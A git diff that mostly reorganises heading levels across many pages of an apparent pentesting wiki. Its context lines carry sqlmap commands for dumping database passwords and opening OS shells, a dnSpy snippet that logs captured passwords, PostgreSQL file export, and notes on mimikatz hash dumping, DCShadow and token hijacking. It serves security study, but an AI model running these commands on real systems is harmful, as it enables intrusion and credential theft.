 Following the SAML Request generation, the SP responds with a **302 redirect**, directing the browser to the IdP with the SAML Request encoded in the HTTP response's **Location** header. The **RelayState** parameter maintains the state information throughout the transaction, ensuring the SP recognizes the initial resource request upon receiving the SAML Response. The **SAMLRequest** parameter is a compressed and encoded version of the raw XML snippet, utilizing Deflate compression and base64 encoding.
 
-# SAML Response Example
+## SAML Response Example
 
 You can find a [full SAML response here](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/). The key components of the response include:
 
@@ -71,7 +73,7 @@ Following the SAML Response, the process includes a 302 redirect from the IdP. T
 
 After the POST request is received and the SAML Response is validated, access is granted to the protected resource initially requested by the user. This is illustrated with a `GET` request to the `/secure/` endpoint and a `200 OK` response, indicating successful access to the resource.
 
-# XML Signatures
+## XML Signatures
 
 XML Signatures are versatile, capable of signing an entire XML tree or specific elements within it. They can be applied to any XML Object, not just Response elements. Below are the key types of XML Signatures:
 
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
index be4318369..5625d40a5 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
@@ -1,6 +1,8 @@
+# Big Binary Files Upload in PostgreSQL
+
 {{#include ../../../banners/hacktricks-training.md}}
 
-### PostgreSQL Large Objects
+## PostgreSQL Large Objects
 
 PostgreSQL offers a structure known as **large objects**, accessible via the `pg_largeobject` table, designed for storing large data types, such as images or PDF documents. This approach is advantageous over the `COPY TO` function as it enables the **exportation of data back to the file system**, ensuring an exact replica of the original file is maintained.
 
@@ -76,7 +78,7 @@ select lo_export(173454, '/path/to/your_file');
 select lo_unlink(173454);  -- Deletes the specified large object
 ```
 
-### Limitations
+## Limitations
 
 It's noted that **large objects may have ACLs** (Access Control Lists), potentially restricting access even to objects created by your user. However, older objects with permissive ACLs may still be accessible for content exfiltration.
 
diff --git a/src/pentesting-web/sql-injection/sqlmap.md b/src/pentesting-web/sql-injection/sqlmap.md
index 4d1ee6aa7..ef97182ed 100644
--- a/src/pentesting-web/sql-injection/sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap.md
@@ -1,8 +1,9 @@
+# SQLMap
 {{#include ../../banners/hacktricks-training.md}}
 
-# Basic arguments for SQLmap
+## Basic arguments for SQLmap
 
-## Generic
+### Generic
 
 ```bash
 -u ""
@@ -21,9 +22,9 @@
 --proxy=PROXY
 ```
 
-## Retrieve Information
+### Retrieve Information
 
-### Internal
+#### Internal
 
 ```bash
 --current-user #Get current user
@@ -33,7 +34,7 @@
 --passwords #Get passwords of users in DB
 ```
 
-### DB data
+#### DB data
 
 ```bash
 --all #Retrieve everything
@@ -44,9 +45,9 @@
 -D  -T  -C  #Dump column
 ```
 
-# Injection place
+## Injection place
 
-## From Burp/ZAP capture
+### From Burp/ZAP capture
 
 Capture the request and create a req.txt file
 
@@ -54,20 +55,20 @@ Capture the request and create a req.txt file
 sqlmap -r req.txt --current-user
 ```
 
-## GET Request Injection
+### GET Request Injection
 
 ```bash
 sqlmap -u "http://example.com/?id=1" -p id
 sqlmap -u "http://example.com/?id=*" -p id
 ```
 
-## POST Request Injection
+### POST Request Injection
 
 ```bash
 sqlmap -u "http://example.com" --data "username=*&password=*"
 ```
 
-## Injections in Headers and other HTTP Methods
+### Injections in Headers and other HTTP Methods
 
 ```bash
 #Inside cookie
@@ -83,14 +84,14 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
 #The injection is located at the '*'
 ```
 
-## Second order injection
+### Second order injection
 
 ```bash
 python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
 sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs
 ```
 
-## Shell
+### Shell
 
 ```bash
 #Exec command
@@ -103,7 +104,7 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
 python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
 ```
 
-## Crawl a website with SQLmap and auto-exploit
+### Crawl a website with SQLmap and auto-exploit
 
 ```bash
 sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
@@ -113,28 +114,28 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
 --forms = Parse and test forms
 ```
 
-# Customizing Injection
+## Customizing Injection
 
-## Set a suffix
+### Set a suffix
 
 ```bash
 python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
 ```
 
-## Prefix
+### Prefix
 
 ```bash
 python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "
 ```
 
-## Help finding boolean injection
+### Help finding boolean injection
 
 ```bash
 # The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
 sqlmap -r r.txt -p id --not-string ridiculous --batch
 ```
 
-## Tamper
+### Tamper
 
 ```bash
 --tamper=name_of_the_tamper
diff --git a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
index 16957afc2..e7491b7c5 100644
--- a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
@@ -1,3 +1,5 @@
+# Second Order Injection with SQLMap
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 **SQLMap can exploit Second Order SQLis.**\
diff --git a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
index 64262e4c0..455c2c270 100644
--- a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
+++ b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
@@ -1,3 +1,5 @@
+# PDF Injection
+
 {{#include ../../banners/hacktricks-training.md}}
 
 **If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.**
diff --git a/src/reversing/reversing-tools-basic-methods/angr/README.md b/src/reversing/reversing-tools-basic-methods/angr/README.md
index 2bb827489..87e02f5d6 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/README.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/README.md
@@ -1,8 +1,10 @@
+# Angr
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 Part of this cheatsheet is based on the [angr documentation](https://docs.angr.io/_/downloads/en/stable/pdf/).
 
-# Installation
+## Installation
 
 ```bash
 sudo apt-get install python3-dev libffi-dev build-essential
@@ -12,7 +14,7 @@ source ang/bin/activate
 pip install angr
 ```
 
-# Basic Actions
+## Basic Actions
 
 ```python
 import angr
@@ -32,9 +34,9 @@ proj.filename #Get filename "/bin/true"
 angr.Project('examples/fauxware/fauxware', main_opts={'backend': 'blob', 'arch': 'i386'}, lib_opts={'libc.so.6': {'backend': 'elf'}})
 ```
 
-# Loaded and Main object information
+## Loaded and Main object information
 
-## Loaded Data
+### Loaded Data
 
 ```python
 #LOADED DATA
@@ -59,7 +61,7 @@ proj.loader.all_pe_objects #Get all binaries loaded (Windows)
 proj.loader.find_object_containing(0x400000)#Get object loaded in an address ""
 ```
 
-## Main Object
+### Main Object
 
 ```python
 #Main Object (main binary loaded)
@@ -75,7 +77,7 @@ obj.plt['strcmp'] #Get plt address of a funcion (0x400550)
 obj.reverse_plt[0x400550] #Get function from plt address ('strcmp')
 ```
 
-## Symbols and Relocations
+### Symbols and Relocations
 
 ```python
 strcmp = proj.loader.find_symbol('strcmp') #
@@ -94,7 +96,7 @@ main_strcmp.is_import #True
 main_strcmp.resolvedby #
 ```
 
-## Blocks
+### Blocks
 
 ```python
 #Blocks
@@ -104,9 +106,9 @@ block.instructions #"0xb" Get number of instructions
 block.instruction_addrs #Get instructions addresses "[0x401670, 0x401672, 0x401675, 0x401676, 0x401679, 0x40167d, 0x40167e, 0x40167f, 0x401686, 0x40168d, 0x401694]"
 ```
 
-# Dynamic Analysis
+## Dynamic Analysis
 
-## Simulation Manager, States
+### Simulation Manager, States
 
 ```python
 #Live States
@@ -131,13 +133,13 @@ simgr.step() #Execute one step
 simgr.active[0].regs.rip #Get RIP from the last state
 ```
 
-## Calling functions
+### Calling functions
 
 - You can pass a list of arguments through `args` and a dictionary of environment variables through `env` into `entry_state` and `full_init_state`. The values in these structures can be strings or bitvectors, and will be serialized into the state as the arguments and environment to the simulated execution. The default `args` is an empty list, so if the program you're analyzing expects to find at least an `argv[0]`, you should always provide that!
 - If you'd like to have `argc` be symbolic, you can pass a symbolic bitvector as `argc` to the `entry_state` and `full_init_state` constructors. Be careful, though: if you do this, you should also add a constraint to the resulting state that your value for argc cannot be larger than the number of args you passed into `args`.
 - To use the call state, you should call it with `.call_state(addr, arg1, arg2, ...)`, where `addr` is the address of the function you want to call and `argN` is the Nth argument to that function, either as a python integer, string, or array, or a bitvector. If you want to have memory allocated and actually pass in a pointer to an object, you should wrap it in an PointerWrapper, i.e. `angr.PointerWrapper("point to me!")`. The results of this API can be a little unpredictable, but we're working on it.
 
-## BitVectors
+### BitVectors
 
 ```python
 #BitVectors
@@ -148,7 +150,7 @@ bv.zero_extend(30) #Will add 30 zeros on the left of the bitvector
 bv.sign_extend(30) #Will add 30 zeros or ones on the left of the BV extending the sign
 ```
 
-## Symbolic BitVectors & Constraints
+### Symbolic BitVectors & Constraints
 
 ```python
 x = state.solver.BVS("x", 64) #Symbolic variable BV of length 64
@@ -184,7 +186,7 @@ solver.min(expression) #minimum possible solution to the given expression.
 solver.max(expression) #maximum possible solution to the given expression.
 ```
 
-## Hooking
+### Hooking
 
 ```python
 >>> stub_func = angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained'] # this is a CLASS
@@ -206,7 +208,7 @@ True
 
 Furthermore, you can use `proj.hook_symbol(name, hook)`, providing the name of a symbol as the first argument, to hook the address where the symbol lives
 
-# Examples
+## Examples
 
 {{#include ../../../banners/hacktricks-training.md}}
 
diff --git a/src/reversing/reversing-tools-basic-methods/blobrunner.md b/src/reversing/reversing-tools-basic-methods/blobrunner.md
index a6cd68d9f..5c46864b5 100644
--- a/src/reversing/reversing-tools-basic-methods/blobrunner.md
+++ b/src/reversing/reversing-tools-basic-methods/blobrunner.md
@@ -1,3 +1,5 @@
+# Blobrunner
+
 {{#include ../../banners/hacktricks-training.md}}
 
 The only modified line from the [original code](https://github.com/OALabs/BlobRunner) is the line 10.  
diff --git a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
index 9a1901a41..c604a9f67 100644
--- a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
+++ b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
@@ -1,12 +1,14 @@
+# Satisfiability Modulo Theories (SMT) - Z3
+
 {{#include ../../banners/hacktricks-training.md}}
 
 Very basically, this tool will help us to find values for variables that need to satisfy some conditions and calculating them by hand will be so annoying. Therefore, you can indicate to Z3 the conditions the variables need to satisfy and it will find some values (if possible).
 
 **Some texts and examples are extracted from [https://ericpony.github.io/z3py-tutorial/guide-examples.htm](https://ericpony.github.io/z3py-tutorial/guide-examples.htm)**
 
-# Basic Operations
+## Basic Operations
 
-## Booleans/And/Or/Not
+### Booleans/And/Or/Not
 
 ```python
 #pip3 install z3-solver
@@ -23,7 +25,7 @@ s.check() #If response is "sat" then the model is satifable, if "unsat" somethin
 print(s.model()) #Print valid values to satisfy the model
 ```
 
-## Ints/Simplify/Reals
+### Ints/Simplify/Reals
 
 ```python
 from z3 import *
@@ -45,7 +47,7 @@ set_option(precision=30)
 print(solve(r1**2 + r2**2 == 3, r1**3 == 2))
 ```
 
-## Printing Model
+### Printing Model
 
 ```python
 from z3 import *
@@ -61,7 +63,7 @@ for d in m.decls():
     print("%s = %s" % (d.name(), m[d]))
 ```
 
-# Machine Arithmetic
+## Machine Arithmetic
 
 Modern CPUs and main-stream programming languages use arithmetic over **fixed-size bit-vectors**. Machine arithmetic is available in Z3Py as **Bit-Vectors**.
 
@@ -80,7 +82,7 @@ b = BitVecVal(65535, 32)
 print(simplify(a == b)) #This is False
 ```
 
-## Signed/Unsigned Numbers
+### Signed/Unsigned Numbers
 
 Z3 provides special signed versions of arithmetical operations where it makes a difference whether the **bit-vector is treated as signed or unsigned**. In Z3Py, the operators **<, <=, >, >=, /, % and >>** correspond to the **signed** versions. The corresponding **unsigned** operators are **ULT, ULE, UGT, UGE, UDiv, URem and LShR.**
 
@@ -102,7 +104,7 @@ solve(x < 0)
 solve(ULT(x, 0))
 ```
 
-## Functions
+### Functions
 
 **Interpreted functio**ns such as arithmetic where the **function +** has a **fixed standard interpretation** (it adds two numbers). **Uninterpreted functions** and constants are **maximally flexible**; they allow **any interpretation** that is **consistent** with the **constraints** over the function or constant.
 
@@ -127,9 +129,9 @@ s.check()
 print(m.model())
 ```
 
-# Examples
+## Examples
 
-## Sudoku solver
+### Sudoku solver
 
 ```python
 # 9x9 matrix of integer variables
diff --git a/src/reversing/reversing-tools/README.md b/src/reversing/reversing-tools/README.md
index ca9f57426..246632d3f 100644
--- a/src/reversing/reversing-tools/README.md
+++ b/src/reversing/reversing-tools/README.md
@@ -1,21 +1,23 @@
+# Reversing Tools
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# Wasm Decompilation and Wat Compilation Guide
 
+## Wasm Decompilation and Wat Compilation Guide
 In the realm of **WebAssembly**, tools for **decompiling** and **compiling** are essential for developers. This guide introduces some online resources and software for handling **Wasm (WebAssembly binary)** and **Wat (WebAssembly text)** files.
 
-## Online Tools
+### Online Tools
 
 - To **decompile** Wasm to Wat, the tool available at [Wabt's wasm2wat demo](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) comes in handy.
 - For **compiling** Wat back to Wasm, [Wabt's wat2wasm demo](https://webassembly.github.io/wabt/demo/wat2wasm/) serves the purpose.
 - Another decompilation option can be found at [web-wasmdec](https://wwwg.github.io/web-wasmdec/).
 
-## Software Solutions
+### Software Solutions
 
 - For a more robust solution, [JEB by PNF Software](https://www.pnfsoftware.com/jeb/demo) offers extensive features.
 - The open-source project [wasmdec](https://github.com/wwwg/wasmdec) is also available for decompilation tasks.
 
-# .Net Decompilation Resources
+## .Net Decompilation Resources
 
 Decompiling .Net assemblies can be accomplished with tools such as:
 
@@ -23,19 +25,19 @@ Decompiling .Net assemblies can be accomplished with tools such as:
 - For tasks involving **decompilation**, **modification**, and **recompilation**, [dnSpy](https://github.com/0xd4d/dnSpy/releases) is highly recommended. **Right-clicking** a method and choosing **Modify Method** enables code changes.
 - [JetBrains' dotPeek](https://www.jetbrains.com/es-es/decompiler/) is another alternative for decompiling .Net assemblies.
 
-## Enhancing Debugging and Logging with DNSpy
+### Enhancing Debugging and Logging with DNSpy
 
-### DNSpy Logging
+#### DNSpy Logging
 
 To log information to a file using DNSpy, incorporate the following .Net code snippet:
 
-%%%cpp
+```cpp
 using System.IO;
 path = "C:\\inetpub\\temp\\MyTest2.txt";
 File.AppendAllText(path, "Password: " + password + "\n");
-%%%
+```
 
-### DNSpy Debugging
+#### DNSpy Debugging
 
 For effective debugging with DNSpy, a sequence of steps is recommended to adjust **Assembly attributes** for debugging, ensuring that optimizations that could hinder debugging are disabled. This process includes changing the `DebuggableAttribute` settings, recompiling the assembly, and saving the changes.
 
@@ -85,14 +87,14 @@ To decompile Java bytecode, these tools can be very helpful:
 ### Deobfuscation and Analysis
 
 - **scdbg** provides insights into shellcode functions and deobfuscation capabilities.
-  %%%bash
+  ```bash
   scdbg.exe -f shellcode # Basic info
   scdbg.exe -f shellcode -r # Analysis report
   scdbg.exe -f shellcode -i -r # Interactive hooks
   scdbg.exe -f shellcode -d # Dump decoded shellcode
   scdbg.exe -f shellcode /findsc # Find start offset
   scdbg.exe -f shellcode /foff 0x0000004D # Execute from offset
-  %%%
+  ```
 
 - **CyberChef** for disassembling shellcode: [CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29)
 
diff --git a/src/todo/6881-udp-pentesting-bittorrent.md b/src/todo/6881-udp-pentesting-bittorrent.md
deleted file mode 100644
index 1fffcb957..000000000
--- a/src/todo/6881-udp-pentesting-bittorrent.md
+++ /dev/null
@@ -1,6 +0,0 @@
-{{#include ../banners/hacktricks-training.md}}
-
-{{#include ../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/todo/burp-suite.md b/src/todo/burp-suite.md
index 62d07e098..fa8aa1b0c 100644
--- a/src/todo/burp-suite.md
+++ b/src/todo/burp-suite.md
@@ -1,6 +1,8 @@
+# Burp Suite
+
 {{#include ../banners/hacktricks-training.md}}
 
-# Basic Payloads
+## Basic Payloads
 
 - **Simple List:** Just a list containing an entry in each line
 - **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.
diff --git a/src/todo/interesting-http.md b/src/todo/interesting-http.md
index 11f37f9b2..cf0ee0033 100644
--- a/src/todo/interesting-http.md
+++ b/src/todo/interesting-http.md
@@ -1,14 +1,16 @@
+# Interesting HTTP
+
 {{#include ../banners/hacktricks-training.md}}
 
-# Referrer headers and policy
+## Referrer headers and policy
 
 Referrer is the header used by browsers to indicate which was the previous page visited.
 
-## Sensitive information leaked
+### Sensitive information leaked
 
 If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest (social engineering) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request.
 
-## Mitigation
+### Mitigation
 
 You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications:
 
@@ -23,7 +25,7 @@ Referrer-Policy: strict-origin-when-cross-origin
 Referrer-Policy: unsafe-url
 ```
 
-## Counter-Mitigation
+### Counter-Mitigation
 
 You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):
 
diff --git a/src/todo/misc.md b/src/todo/misc.md
index c2bdbee52..4bcf325f7 100644
--- a/src/todo/misc.md
+++ b/src/todo/misc.md
@@ -1,3 +1,5 @@
+# Misc
+
 {{#include ../banners/hacktricks-training.md}}
 
 In a ping response TTL:\
diff --git a/src/todo/more-tools.md b/src/todo/more-tools.md
index 9e13a3f70..1a71c295b 100644
--- a/src/todo/more-tools.md
+++ b/src/todo/more-tools.md
@@ -1,7 +1,9 @@
+# More tools
+
 {{#include ../banners/hacktricks-training.md}}
 
 
-# BlueTeam
+## BlueTeam
 
 - [https://github.com/yarox24/attack_monitor](https://github.com/yarox24/attack_monitor)
 - [https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/](https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/)
@@ -9,7 +11,7 @@
 - [https://github.com/PaperMtn/lil-pwny](https://github.com/PaperMtn/lil-pwny) : Check disclosed accounts
 - [https://github.com/rabobank-cdc/DeTTECT](https://github.com/rabobank-cdc/DeTTECT)
 
-# OSINT
+## OSINT
 
 - [https://github.com/3vangel1st/kamerka](https://github.com/3vangel1st/kamerka)
 - [https://github.com/BullsEye0/google_dork_list](https://github.com/BullsEye0/google_dork_list)
@@ -30,7 +32,7 @@
 - [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
 - [https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/sys/tools/subdomainfinder/) : 8 Subdomain finder tools, sublist3r, amass and more
 
-# **WEB**
+## **WEB**
 
 - [https://github.com/AlisamTechnology/ATSCAN](https://github.com/AlisamTechnology/ATSCAN)
 - [https://github.com/momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder)
@@ -57,7 +59,7 @@
 - [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : Automatic authentication tests (remove cookies and try to send the request)
 - [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCross is a Reconstruction, Scanner, and a tool for penetration / BugBounty testing. This tool was built to test (XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI) vulnerabilities
 
-# Windows
+## Windows
 
 - [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : Lateral movements
 - [https://freddiebarrsmith.com/trix/trix.html](https://freddiebarrsmith.com/trix/trix.html) : LOL bins
@@ -73,7 +75,7 @@
 - [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : Track who open a document
 - [https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet) : Active Directory Cheat Sheet
 
-# Firmware
+## Firmware
 
 Tools q veo q pueden molar para analizar firmares (automaticas):
 
@@ -94,7 +96,7 @@ y por aqui la metodologia owasp para analizar firmware: [https://github.com/scri
 
 Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a platform for automating the emulation and dynamic analysis of Linux-based firmware.
 
-# OTHER
+## OTHER
 
 - [https://twitter.com/HackAndDo/status/1202695084543791117](https://twitter.com/HackAndDo/status/1202695084543791117)
 - [https://github.com/weev3/LKWA](https://github.com/weev3/LKWA)
diff --git a/src/todo/pentesting-dns.md b/src/todo/pentesting-dns.md
deleted file mode 100644
index b8527a78f..000000000
--- a/src/todo/pentesting-dns.md
+++ /dev/null
@@ -1,12 +0,0 @@
-{{#include ../banners/hacktricks-training.md}}
-
-**Research more about attacks to DNS**
-
-**DNSSEC and DNSSEC3**
-
-**DNS in IPv6**
-
-{{#include ../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/todo/post-exploitation.md b/src/todo/post-exploitation.md
index 9fee7c27c..347763ed1 100644
--- a/src/todo/post-exploitation.md
+++ b/src/todo/post-exploitation.md
@@ -1,3 +1,5 @@
+# Post Exploitation
+
 {{#include ../banners/hacktricks-training.md}}
 
 ## **Local l00t**
diff --git a/src/todo/references.md b/src/todo/references.md
deleted file mode 100644
index eb3792a1f..000000000
--- a/src/todo/references.md
+++ /dev/null
@@ -1,95 +0,0 @@
-{{#include ../banners/hacktricks-training.md}}
-
-{{#ref}}
-https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick
-{{#endref}}
-
-{{#ref}}
-https://hausec.com/pentesting-cheatsheet/#_Toc475368982
-{{#endref}}
-
-{{#ref}}
-https://anhtai.me/pentesting-cheatsheet/
-{{#endref}}
-
-{{#ref}}
-https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
-{{#endref}}
-
-{{#ref}}
-https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
-{{#endref}}
-
-{{#ref}}
-https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html
-{{#endref}}
-
-{{#ref}}
-https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
-{{#endref}}
-
-{{#ref}}
-https://anhtai.me/oscp-fun-guide/
-{{#endref}}
-
-{{#ref}}
-https://www.thehacker.recipes/
-{{#endref}}
-
-{{#ref}}
-https://github.com/swisskyrepo/PayloadsAllTheThings
-{{#endref}}
-
-{{#ref}}
-https://gtfobins.github.io/
-{{#endref}}
-
-{{#ref}}
-https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
-{{#endref}}
-
-{{#ref}}
-https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
-{{#endref}}
-
-{{#ref}}
-https://hideandsec.sh/
-{{#endref}}
-
-{{#ref}}
-https://cheatsheet.haax.fr/
-{{#endref}}
-
-{{#ref}}
-https://infosecwriteups.com/
-{{#endref}}
-
-{{#ref}}
-https://www.exploit-db.com/
-{{#endref}}
-
-{{#ref}}
-https://wadcoms.github.io/
-{{#endref}}
-
-{{#ref}}
-https://lolbas-project.github.io
-{{#endref}}
-
-{{#ref}}
-https://pentestbook.six2dez.com/
-{{#endref}}
-
-{{#ref}}
-https://www.hackingarticles.in/
-{{#endref}}
-
-{{#ref}}
-https://pentestlab.blog/
-{{#endref}}
-
-{{#ref}}
-https://ippsec.rocks/
-{{#endref}}
-
-{{#include ../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
index da5d84b04..f29bcfdb4 100644
--- a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
+++ b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
@@ -1,3 +1,5 @@
+# Information in Printers
+
 {{#include ../../banners/hacktricks-training.md}}
 
 There are several blogs in the Internet which **highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials.\
diff --git a/src/windows-hardening/active-directory-methodology/dcshadow.md b/src/windows-hardening/active-directory-methodology/dcshadow.md
index 2291069dc..c0b1a41d0 100644
--- a/src/windows-hardening/active-directory-methodology/dcshadow.md
+++ b/src/windows-hardening/active-directory-methodology/dcshadow.md
@@ -1,6 +1,9 @@
+# DCShadow
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# DCShadow
+
+## Basic Information
 
 It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\
 Note that if you use wrong data, pretty ugly logs will appear.
diff --git a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
index f9f38abe2..754ae91b4 100644
--- a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
@@ -1,6 +1,8 @@
+# DSRM Credentials
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# DSRM Credentials
+## Basic Information
 
 There is a **local administrator** account inside each **DC**. Having admin privileges in this machine you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\
 First we need to **dump** the **hash** of the **local Administrator** user inside the DC:
diff --git a/src/windows-hardening/mythic.md b/src/windows-hardening/mythic.md
index 177124cd2..6dff9ee21 100644
--- a/src/windows-hardening/mythic.md
+++ b/src/windows-hardening/mythic.md
@@ -1,4 +1,6 @@
-# Mythic
+# Mythic
+
+{{#include ../banners/hacktricks-training.md}}
 
 ## What is Mythic?
 
@@ -174,3 +176,5 @@ When user over linux it has some interesting commands:
 - `run`: Execute a command from disk with arguments, allowing for the execution of binaries or scripts on the target system.
 - `pty`: Open up an interactive PTY, allowing for direct interaction with the shell on the target system.
 
+
+{{#include ../banners/hacktricks-training.md}}
\ No newline at end of file
diff --git a/src/windows-hardening/stealing-credentials/wts-impersonator.md b/src/windows-hardening/stealing-credentials/wts-impersonator.md
index e970ad22b..f93e1f653 100644
--- a/src/windows-hardening/stealing-credentials/wts-impersonator.md
+++ b/src/windows-hardening/stealing-credentials/wts-impersonator.md
@@ -1,3 +1,5 @@
+# WTS Impersonator
+
 {{#include ../../banners/hacktricks-training.md}}
 
 The **WTS Impersonator** tool exploits the **"\\pipe\LSM_API_service"** RPC Named pipe to stealthily enumerate logged-in users and hijack their tokens, bypassing traditional Token Impersonation techniques. This approach facilitates seamless lateral movements within networks. The innovation behind this technique is credited to **Omri Baso, whose work is accessible on [GitHub](https://github.com/OmriBaso/WTSImpersonator)**.
diff --git a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
index 06a9bfe5c..3d0fba043 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
@@ -1,3 +1,5 @@
+# AppendData/AddSubdirectory Permission over Service Registry
+
 {{#include ../../banners/hacktricks-training.md}}
 
 **The original post is** [**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/)
diff --git a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
index 66585f6d9..3bb6dc73e 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
@@ -1,7 +1,7 @@
-{{#include ../../banners/hacktricks-training.md}}
-
 # Creating Malicious MSI and Getting Root
 
+{{#include ../../banners/hacktricks-training.md}}
+
 The creation of the MSI installer will be done using wixtools, specifically [wixtools](http://wixtoolset.org) will be utilized. It is worth mentioning that alternative MSI builders were attempted, but they were not successful in this particular case.
 
 For a comprehensive understanding of wix MSI usage examples, it is advisable to consult [this page](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with). Here, you can find various examples that demonstrate the usage of wix MSI.
diff --git a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
index 4d966072f..6969c4822 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
@@ -1,3 +1,5 @@
+# From High Integrity to SYSTEM with Name Pipes
+
 {{#include ../../banners/hacktricks-training.md}}
 
 **Code flow:**
